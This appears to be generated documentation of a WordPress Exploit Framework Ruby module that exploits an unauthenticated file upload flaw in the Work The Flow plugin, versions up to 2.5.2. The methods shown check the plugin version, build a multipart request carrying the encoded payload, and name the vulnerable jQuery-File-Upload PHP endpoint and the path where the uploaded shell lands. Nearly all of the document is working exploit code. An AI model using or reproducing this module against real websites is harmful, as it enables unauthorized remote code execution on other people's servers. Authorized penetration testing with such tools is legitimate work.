class Wpxf::Exploit::WorkTheFlowShellUpload

Public Class Methods

new() click to toggle source
Calls superclass method Wpxf::WordPress::ShellUpload::new
# File lib/wpxf/modules/exploit/shell/work_the_flow_shell_upload.rb, line 6
def initialize
  super

  update_info(
    name: 'Work The Flow Shell Upload',
    desc: 'This module exploits a file upload vulnerability in versions '\
          '<= 2.5.2 of the Work The Flow plugin which '\
          'allows unauthenticated users to upload and execute PHP scripts '\
          'in the context of the web server.',
    author: [
      'Claudio Viviani', # Vulnerability discovery
      'rastating'        # WPXF module
    ],
    references: [
      ['WPVDB', '7883'],
      ['EDB', '36640']
    ],
    date: 'Mar 14 2015'
  )
end

Public Instance Methods

check() click to toggle source
# File lib/wpxf/modules/exploit/shell/work_the_flow_shell_upload.rb, line 27
def check
  check_plugin_version_from_readme('work-the-flow-file-upload', '2.5.3')
end
payload_body_builder() click to toggle source
# File lib/wpxf/modules/exploit/shell/work_the_flow_shell_upload.rb, line 51
def payload_body_builder
  builder = Utility::BodyBuilder.new
  builder.add_field('action', 'upload')
  builder.add_file_from_string('files', payload.encoded, payload_name)
  builder
end
plugin_url() click to toggle source
# File lib/wpxf/modules/exploit/shell/work_the_flow_shell_upload.rb, line 31
def plugin_url
  normalize_uri(
    wordpress_url_plugins,
    'work-the-flow-file-upload',
    'public',
    'assets',
    'jQuery-File-Upload-9.5.0',
    'server',
    'php'
  )
end
uploaded_payload_location() click to toggle source
# File lib/wpxf/modules/exploit/shell/work_the_flow_shell_upload.rb, line 47
def uploaded_payload_location
  normalize_uri(plugin_url, 'files', payload_name)
end
uploader_url() click to toggle source
# File lib/wpxf/modules/exploit/shell/work_the_flow_shell_upload.rb, line 43
def uploader_url
  normalize_uri(plugin_url, 'index.php')
end